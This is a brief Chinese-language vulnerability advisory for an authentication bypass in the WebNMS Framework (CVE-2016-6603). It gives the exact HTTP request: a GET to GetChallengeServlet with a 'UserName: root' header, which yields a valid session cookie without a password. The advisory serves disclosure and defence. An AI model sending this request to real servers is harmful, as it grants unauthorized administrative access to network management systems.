### 概要
WebNMS 是一个业界领先的用于构建网络管理应用的架构。通过提交自定义的headers参数可以直接得到会话Cookie,跳过登录验证。
### 漏洞细节
提交如下 Get 请求,HTTP header 中添加一个 UserName 指定用户名,返回的 JSESSIONID Cookie 可以直接用于会话认证。
GET /servlets/GetChallengeServlet HTTP/1.1
UserName: root
下载官方Windows试用版软件测试通过:
http://www.webnms.com/webnms/14107380/WebNMS_Framework_5_STD_Windows.exe
### 其它信息
* 漏洞发现者:Pedro Ribeiro <pedrib[at]gmail.com>
* CVE编号:CVE-2016-6603
* 影响版本:<= 5.2SP1
暂无评论